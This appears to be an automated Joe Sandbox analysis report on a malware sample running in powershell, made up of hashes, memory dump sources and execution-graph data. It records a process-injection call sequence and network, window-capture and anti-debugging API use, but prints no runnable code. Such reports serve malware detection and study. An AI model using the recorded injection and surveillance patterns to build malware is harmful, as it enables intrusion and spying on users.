                                                                                • Opcode Fuzzy Hash: 13bc403d4af0bcb4328e59a91e24f0db057d9fa851cc6b89cd9cd2743ce10c3d
                                                                                • Instruction Fuzzy Hash: D7F0C271504340AFEB108A15DCC4B66FB98EB41734F18C15AEC480F292C3799C45CAB1

                                                                                Execution Graph

                                                                                Execution Coverage:11.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:58.7%
                                                                                Total number of Nodes:46
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph (rendered graph data omitted; API call nodes reached on the executed path, in order: CreateProcessW, Wow64SetThreadContext, WriteProcessMemory, ResumeThread)

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextMemoryProcessThreadWow64Write
                                                                                • String ID:
                                                                                • API String ID: 3696009080-0
                                                                                • Opcode ID: 8c4a549d8bf4df82b3c7b68d271f2e55394189219032023c3a00b164edf2e431
                                                                                • Instruction ID: d403d54b2d97102eec42af4729b65173c2202ade966b4a2569ecf70904c1f01e
                                                                                • Opcode Fuzzy Hash: 8c4a549d8bf4df82b3c7b68d271f2e55394189219032023c3a00b164edf2e431
                                                                                • Instruction Fuzzy Hash: FB62ED74E112298FEB65DF65C894BEDBBB2BB89300F5081EAD40DA7291DB305E85CF50

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a7910e761eba46100cf91860e4aa723d0cb339f5f8cb3e1ddecac8683053442d
                                                                                • Instruction ID: 5b518f809e3895a87446dfd4316142f44200c7c8fa4e088a5e875865358483a2
                                                                                • Opcode Fuzzy Hash: a7910e761eba46100cf91860e4aa723d0cb339f5f8cb3e1ddecac8683053442d
                                                                                • Instruction Fuzzy Hash: 5932EF74E112298FEB65DF65C894BEDBBB2BB89300F5081EAD50DA7291DB305E85CF40

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L4#p$L4#p$L4#p$d=,
                                                                                • API String ID: 0-59673657
                                                                                • Opcode ID: ed5e6db054c13d3acf666e4b9f5925b35f2653c31069a321d542afc3c7da2d21
                                                                                • Instruction ID: 355b3921a76f70fff9aa361b29511017661df3fc77d22e4e75f18226dad1a0f1
                                                                                • Opcode Fuzzy Hash: ed5e6db054c13d3acf666e4b9f5925b35f2653c31069a321d542afc3c7da2d21
                                                                                • Instruction Fuzzy Hash: 38B11931700268EFDF259F24E844BBE77A1AF85310F14846AE5058B293CB79DD57CB51

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x720bb5; no API calls in this graph)
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: l;,$l;,
                                                                                • API String ID: 0-3674293618
                                                                                • Opcode ID: 9504b3a014973e84509e3ef30e47aeac80b4db509e0d9f395a2d742101c0bee7
                                                                                • Instruction ID: e766eae8ebcd219a54e6c0b9dcb782ba6123cde251209bc08d2d27b3091782bf
                                                                                • Opcode Fuzzy Hash: 9504b3a014973e84509e3ef30e47aeac80b4db509e0d9f395a2d742101c0bee7
                                                                                • Instruction Fuzzy Hash: 7D411675B00221CFDF285A74B8146BAB3A2AFD0310B24857AC4598B293DE79DD91D7B2

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x29172c; calls CreateProcessW)
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00295B0F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 12bb9d16c1767d5d2f5b9e152ad4efcb86e3eceaa0800b2a6e68f575cac351b6
                                                                                • Instruction ID: b7d37d4e3ca90e37f3536d4be8405ce440c11c68076977398b6c6ba4672f66e7
                                                                                • Opcode Fuzzy Hash: 12bb9d16c1767d5d2f5b9e152ad4efcb86e3eceaa0800b2a6e68f575cac351b6
                                                                                • Instruction Fuzzy Hash: C581EF70D0022D9FDF25CFA4C844BEDBBB1AB49304F1090AAE508B7250DB709E99CF94

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x29592e; calls CreateProcessW)
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00295B0F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: bcd232620c48ee65e1de23426f903661727a1b617aa4b779a10154e61295d798
                                                                                • Instruction ID: fd5847e9009600049d579f85f229fef32a47dd2f8132a21dd00f0746c374fe1b
                                                                                • Opcode Fuzzy Hash: bcd232620c48ee65e1de23426f903661727a1b617aa4b779a10154e61295d798
                                                                                • Instruction Fuzzy Hash: 0E81DF70D0022D9FDF25CF65C844BEDBBB1AB49304F1090AAE548B7250DB709E99CF94

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x291774; calls WriteProcessMemory)
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00296066
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: ee22c15ac88764d775ead4ec9a56aa33b11fbe53e8ba19f046a44746798eada5
                                                                                • Instruction ID: 0746218b651a042df81d5787bcd790dc2b09b7b30b7a2e4d2762eab7b1886a24
                                                                                • Opcode Fuzzy Hash: ee22c15ac88764d775ead4ec9a56aa33b11fbe53e8ba19f046a44746798eada5
                                                                                • Instruction Fuzzy Hash: 59419AB5D102589FCF10CFA9D984ADEFBF1BB49310F24902AE818B7210D375AA55CF64

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x295f91; calls WriteProcessMemory)
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00296066
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 94b30659f9ed92a9f8a6717edc9d9b1b2715080091f186da82a8d5a3997ad560
                                                                                • Instruction ID: 853b89f3b014b9f50c9094d7534e4da273b4a53336b77da46d36a44775717ff7
                                                                                • Opcode Fuzzy Hash: 94b30659f9ed92a9f8a6717edc9d9b1b2715080091f186da82a8d5a3997ad560
                                                                                • Instruction Fuzzy Hash: 254198B5D002589FCF10CFA9D984ADEFBF1BB49310F24902AE818B7210D375AA55CF64

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x291738; calls Wow64SetThreadContext)
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00295D12
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 93b9883901e9ba5b63876db6c815ebab0fefe4549f868838fa1d06ee58de84b1
                                                                                • Instruction ID: 256fae047d19e0a82b5a473744744f4348bb3653e5476071f9190a0fa579e73a
                                                                                • Opcode Fuzzy Hash: 93b9883901e9ba5b63876db6c815ebab0fefe4549f868838fa1d06ee58de84b1
                                                                                • Instruction Fuzzy Hash: F731ABB5D112589FCF10CFA9D984ADEFBF1AB49314F24802AE418B7350D378AA45CF64

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x291780; calls Wow64SetThreadContext)
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00295D12
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: f988ffe22d283ac467747d6cb43678ee1bbab43e04698e04b5193facb691d650
                                                                                • Instruction ID: 4aae0b1f626be14c8f521f09b03b4944f90f2236f36b591b6462651197a7148b
                                                                                • Opcode Fuzzy Hash: f988ffe22d283ac467747d6cb43678ee1bbab43e04698e04b5193facb691d650
                                                                                • Instruction Fuzzy Hash: 8231ABB5D112589FCF10CFA9D984AEEFBF1AB49314F24802AE418B7350D378AA45CF64

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x295c66; calls Wow64SetThreadContext)
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00295D12
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: b1705570c383497ce366d149b4bd64d60523709d4b0446754602d86d6e7d06c3
                                                                                • Instruction ID: 2d4e9b0334672429cf54b93172583e5532870ae8b646eabf04eec3a83e6d9ab5
                                                                                • Opcode Fuzzy Hash: b1705570c383497ce366d149b4bd64d60523709d4b0446754602d86d6e7d06c3
                                                                                • Instruction Fuzzy Hash: 4B3198B5D112589FDF10CFAAD984ADEFBF1AB49314F24802AE418B7350D378AA45CF64

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x2960d0; calls ResumeThread)
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 0029614E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: a8e6357a56b3c22bceafac383e55691c9030f93733e68bfaf5b164bdf56ccb25
                                                                                • Instruction ID: e25746232a3eff7f43d28b42ee0c71da07f319b33956ccc96e22c0c433b57b08
                                                                                • Opcode Fuzzy Hash: a8e6357a56b3c22bceafac383e55691c9030f93733e68bfaf5b164bdf56ccb25
                                                                                • Instruction Fuzzy Hash: FE21ACB5D042099FCF10CFA9D984ADEFBF4AB49314F24945AE818B7310D374A945CFA5

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x291798; calls ResumeThread)
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 0029614E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438220970.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_290000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 0d3b9f05fb12e7e4f3c64eb718d153b75cda5430743942b6d08b770839105071
                                                                                • Instruction ID: 9ee0a1cc9127ba2ace1b8ca101828923eaf07bb546e6463c07d0c18cf3356749
                                                                                • Opcode Fuzzy Hash: 0d3b9f05fb12e7e4f3c64eb718d153b75cda5430743942b6d08b770839105071
                                                                                • Instruction Fuzzy Hash: D521ACB4D102089FCF10CFA9D884ADEFBF4AB49314F20901AE819B7310D374A945CFA4

                                                                                Control-flow Graph

                                                                                Control-flow graph rendering omitted (function starting at 0x721730; no API calls in this graph)
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff6ebca688521d8d8f3bdff99905b45e9ada2de0d7be7baed4c9806b78948eae
                                                                                • Instruction ID: 0e32c05cdbf5eb5a924cda8efc6ab2175f326b052a685e054ceca0b980cf7b44
                                                                                • Opcode Fuzzy Hash: ff6ebca688521d8d8f3bdff99905b45e9ada2de0d7be7baed4c9806b78948eae
                                                                                • Instruction Fuzzy Hash: 77412636700221DBDB298E64E4406BAB3E1BFF1321BB885BBD8558B351DB79CD41CB51
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
• Opcode ID: 0b696d7958da03316e64f1cdae4031651123c88aa60bb5eac3d788f2e7169616
• Instruction ID: 8a745e0850276bd653eff58660bcb4eca2758a96331a785bbc8f19f06aceb53a
• Opcode Fuzzy Hash: 0b696d7958da03316e64f1cdae4031651123c88aa60bb5eac3d788f2e7169616
• Instruction Fuzzy Hash: 9B312B36B042218FDB15AE74E4546BAB7A1EFD1320B2984AAD4458B252DB39CC91C7F1
Memory Dump Source
• Source File: 0000000C.00000002.438019746.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f07c7597c83a8c4462500e4d813b37128bc6538f8fdb4214aef46194b85e335
• Instruction ID: f2e8ccc506b1ca50d74f0dc69d11f4b210de71843adccbcd21296b1cda706c6f
• Opcode Fuzzy Hash: 9f07c7597c83a8c4462500e4d813b37128bc6538f8fdb4214aef46194b85e335
• Instruction Fuzzy Hash: A501A771504340AEE7144A15EC84B6BBB98DFC1724F18C55BFD490B382C3799D45CAB1
Memory Dump Source
• Source File: 0000000C.00000002.438019746.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ad282f47db868c485d12c41e505c1a57e06af6a9d91c0dbb528b5ad34b075b8
• Instruction ID: fb66700c74e2d23876b6d170a4fe90a2221e62255db5be76dc7b559da5a6f319
• Opcode Fuzzy Hash: 3ad282f47db868c485d12c41e505c1a57e06af6a9d91c0dbb528b5ad34b075b8
• Instruction Fuzzy Hash: 0C01756150D3C09FD7128B259C94B56BFB4DF53624F19C1DBE8888F2A3C2699C45C772
Memory Dump Source
• Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_720000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be87a07977524bcf3d15926baa15fc9327b4ce546cc80640477fa17137c68703
• Instruction ID: 91b52bfb67051b9af28a30956cc99613dc7df7ec817780a77f8a5756d3edc648
• Opcode Fuzzy Hash: be87a07977524bcf3d15926baa15fc9327b4ce546cc80640477fa17137c68703
• Instruction Fuzzy Hash: 42E0D875B042548EDF15A660A0213BD7761BFF2211FA081F6C85097245DA388916C762
Strings
Memory Dump Source
• Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_720000_powershell.jbxd
Similarity
• API ID:
• String ID: (:,$(:,$(:,$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:,$L:,$L:,
• API String ID: 0-2198573534
• Opcode ID: 1dd4c9b009fe1ac3065ca8fac19e3f7276f1903ee8531a4c337dc82387ea8f67
• Instruction ID: 2b10ce4cf1c99a39e576dd924671afeeaf4036219c9a8e4dfba3ad603189fabf
• Opcode Fuzzy Hash: 1dd4c9b009fe1ac3065ca8fac19e3f7276f1903ee8531a4c337dc82387ea8f67
• Instruction Fuzzy Hash: 72D12531B00268EFDF159E64E814BBE77A2BF85310F14806AE9059B293CB79DD51CBE1

Execution Graph

Execution Coverage: 5.9%
Dynamic/Decrypted Code Coverage: 19.6%
Signature Coverage: 3.9%
Total number of Nodes: 1519
Total number of Limit Nodes: 43
execution_graph: [interactive graph data: node identifiers, code addresses and edges for the 1519 nodes / 43 limit nodes listed above; not reproducible as text]
Windows API calls named on the graph nodes include: InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle, WSAStartup, socket, connect, send, recv, closesocket, CreateEventW, CreateEventA, SetEvent, WaitForSingleObject, CreateThread, CloseHandle, RtlAllocateHeap, HeapFree, VirtualProtect, GetModuleHandleA, LoadLibraryExW, FreeLibrary, GetProcAddress, GetLocalTime, GetTickCount, GetLastInputInfo, GetForegroundWindow, GetWindowTextW, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW, GetOEMCP, GetACP, GetCPInfo, IsValidCodePage, GetLastError, SetLastError, TlsAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, RtlEnterCriticalSection, RtlLeaveCriticalSection, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess.
54171 43465c 54171->54138 54174 4442e9 54173->54174 54175 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54174->54175 54176 43496d 54175->54176 54176->54144 54177 444276 54176->54177 54178 4442a5 54177->54178 54179 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54178->54179 54180 4442ce 54179->54180 54180->54149 54182 436f10 ___scrt_fastfail 54181->54182 54183 434bb8 GetStartupInfoW 54182->54183 54184 4349f9 54183->54184 54185 444223 54184->54185 54534 44f0d9 54185->54534 54187 44422c 54189 434a02 54187->54189 54538 446895 36 API calls 54187->54538 54190 40ea00 54189->54190 54668 41cbe1 LoadLibraryA GetProcAddress 54190->54668 54192 40ea1c GetModuleFileNameW 54673 40f3fe 54192->54673 54194 40ea38 54195 4020f6 28 API calls 54194->54195 54196 40ea47 54195->54196 54197 4020f6 28 API calls 54196->54197 54198 40ea56 54197->54198 54199 41beac 28 API calls 54198->54199 54200 40ea5f 54199->54200 54688 40fb52 54200->54688 54202 40ea68 54203 401e8d 11 API calls 54202->54203 54204 40ea71 54203->54204 54205 40ea84 54204->54205 54206 40eace 54204->54206 54883 40fbee 118 API calls 54205->54883 54207 401e65 22 API calls 54206->54207 54209 40eade 54207->54209 54213 401e65 22 API calls 54209->54213 54210 40ea96 54211 401e65 22 API calls 54210->54211 54212 40eaa2 54211->54212 54884 410f72 36 API calls __EH_prolog 54212->54884 54214 40eafd 54213->54214 54215 40531e 28 API calls 54214->54215 54217 40eb0c 54215->54217 54219 406383 28 API calls 54217->54219 54218 40eab4 54885 40fb9f 78 API calls 54218->54885 54221 40eb18 54219->54221 54223 401fe2 28 API calls 54221->54223 54222 40eabd 54886 40f3eb 71 API calls 54222->54886 54225 40eb24 54223->54225 54226 401fd8 11 API calls 54225->54226 54227 40eb2d 54226->54227 54229 401fd8 11 API calls 54227->54229 54231 40eb36 54229->54231 54232 401e65 22 API calls 54231->54232 54233 40eb3f 54232->54233 54234 401fc0 28 API calls 54233->54234 54235 40eb4a 54234->54235 54236 401e65 22 API calls 
54235->54236 54237 40eb63 54236->54237 54238 401e65 22 API calls 54237->54238 54239 40eb7e 54238->54239 54240 40ebe9 54239->54240 54887 406c59 54239->54887 54241 401e65 22 API calls 54240->54241 54246 40ebf6 54241->54246 54243 40ebab 54244 401fe2 28 API calls 54243->54244 54245 40ebb7 54244->54245 54248 401fd8 11 API calls 54245->54248 54247 40ec3d 54246->54247 54253 413584 3 API calls 54246->54253 54692 40d0a4 54247->54692 54250 40ebc0 54248->54250 54892 413584 RegOpenKeyExA 54250->54892 54259 40ec21 54253->54259 54257 40f38a 54985 4139e4 30 API calls 54257->54985 54259->54247 54895 4139e4 30 API calls 54259->54895 54267 40f3a0 54986 4124b0 65 API calls ___scrt_fastfail 54267->54986 54468->54138 54469->54145 54474->54165 54476 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54475->54476 54488 43a4ba 54476->54488 54479 438fc4 54479->54167 54481 438fcc 54482 438fd7 54481->54482 54502 43a4f6 DeleteCriticalSection 54481->54502 54482->54167 54530 44fbe8 54484->54530 54487 438fda 8 API calls 3 library calls 54487->54168 54489 43a4c3 54488->54489 54491 43a4ec 54489->54491 54492 438fc0 54489->54492 54503 438eff 54489->54503 54508 43a4f6 DeleteCriticalSection 54491->54508 54492->54479 54494 43a46c 54492->54494 54523 438e14 54494->54523 54496 43a481 54496->54481 54497 43a476 54497->54496 54528 438ec2 6 API calls try_get_function 54497->54528 54499 43a48f 54500 43a49c 54499->54500 54529 43a49f 6 API calls ___vcrt_FlsFree 54499->54529 54500->54481 54502->54479 54509 438cf3 54503->54509 54506 438f36 InitializeCriticalSectionAndSpinCount 54507 438f22 54506->54507 54507->54489 54508->54492 54510 438d23 54509->54510 54511 438d27 54509->54511 54510->54511 54513 438d47 54510->54513 54516 438d93 54510->54516 54511->54506 54511->54507 54513->54511 54514 438d53 GetProcAddress 54513->54514 54515 438d63 __crt_fast_encode_pointer 54514->54515 54515->54511 54517 438dbb LoadLibraryExW 54516->54517 54522 438db0 54516->54522 54518 438dd7 GetLastError 
54517->54518 54519 438def 54517->54519 54518->54519 54520 438de2 LoadLibraryExW 54518->54520 54521 438e06 FreeLibrary 54519->54521 54519->54522 54520->54519 54521->54522 54522->54510 54524 438cf3 try_get_function 5 API calls 54523->54524 54525 438e2e 54524->54525 54526 438e46 TlsAlloc 54525->54526 54527 438e37 54525->54527 54527->54497 54528->54499 54529->54496 54533 44fc01 54530->54533 54531 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54532 43464e 54531->54532 54532->54171 54532->54487 54533->54531 54535 44f0eb 54534->54535 54536 44f0e2 54534->54536 54535->54187 54539 44efd8 54536->54539 54538->54187 54540 448295 pre_c_initialization 36 API calls 54539->54540 54541 44efe5 54540->54541 54559 44f0f7 54541->54559 54543 44efed 54568 44ed6c 54543->54568 54546 44f004 54546->54535 54549 44f047 54551 446802 _free 20 API calls 54549->54551 54551->54546 54553 44f042 54592 44062d 20 API calls _free 54553->54592 54555 44f08b 54555->54549 54593 44ec42 20 API calls 54555->54593 54556 44f05f 54556->54555 54557 446802 _free 20 API calls 54556->54557 54557->54555 54560 44f103 CallCatchBlock 54559->54560 54561 448295 pre_c_initialization 36 API calls 54560->54561 54566 44f10d 54561->54566 54563 44f191 CallCatchBlock 54563->54543 54566->54563 54567 446802 _free 20 API calls 54566->54567 54594 446175 36 API calls 4 library calls 54566->54594 54595 445909 EnterCriticalSection 54566->54595 54596 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54566->54596 54567->54566 54569 43a837 __fassign 36 API calls 54568->54569 54570 44ed7e 54569->54570 54571 44ed8d GetOEMCP 54570->54571 54572 44ed9f 54570->54572 54574 44edb6 54571->54574 54573 44eda4 GetACP 54572->54573 54572->54574 54573->54574 54574->54546 54575 4461b8 54574->54575 54576 4461f6 54575->54576 54577 4461c6 __Getctype 54575->54577 54598 44062d 20 API calls _free 54576->54598 54577->54576 54578 4461e1 RtlAllocateHeap 54577->54578 54597 443001 7 API calls 2 library calls 54577->54597 54578->54577 
54580 4461f4 54578->54580 54580->54549 54582 44f199 54580->54582 54583 44ed6c 38 API calls 54582->54583 54584 44f1b8 54583->54584 54587 44f209 IsValidCodePage 54584->54587 54589 44f1bf 54584->54589 54591 44f22e ___scrt_fastfail 54584->54591 54585 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54586 44f03a 54585->54586 54586->54553 54586->54556 54588 44f21b GetCPInfo 54587->54588 54587->54589 54588->54589 54588->54591 54589->54585 54599 44ee44 GetCPInfo 54591->54599 54592->54549 54593->54549 54594->54566 54595->54566 54596->54566 54597->54577 54598->54580 54600 44ef28 54599->54600 54601 44ee7e 54599->54601 54604 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54600->54604 54609 4511ac 54601->54609 54606 44efd4 54604->54606 54606->54589 54608 44aee6 _swprintf 41 API calls 54608->54600 54610 43a837 __fassign 36 API calls 54609->54610 54611 4511cc MultiByteToWideChar 54610->54611 54613 45120a 54611->54613 54621 4512a2 54611->54621 54617 4461b8 ___crtLCMapStringA 21 API calls 54613->54617 54618 45122b __alloca_probe_16 ___scrt_fastfail 54613->54618 54614 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54615 44eedf 54614->54615 54623 44aee6 54615->54623 54616 45129c 54628 435ecd 20 API calls _free 54616->54628 54617->54618 54618->54616 54620 451270 MultiByteToWideChar 54618->54620 54620->54616 54622 45128c GetStringTypeW 54620->54622 54621->54614 54622->54616 54624 43a837 __fassign 36 API calls 54623->54624 54625 44aef9 54624->54625 54629 44acc9 54625->54629 54628->54621 54630 44ace4 ___crtLCMapStringA 54629->54630 54631 44ad0a MultiByteToWideChar 54630->54631 54632 44ad34 54631->54632 54633 44aebe 54631->54633 54637 4461b8 ___crtLCMapStringA 21 API calls 54632->54637 54639 44ad55 __alloca_probe_16 54632->54639 54634 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54633->54634 54635 44aed1 54634->54635 54635->54608 54636 44ad9e MultiByteToWideChar 54638 44adb7 
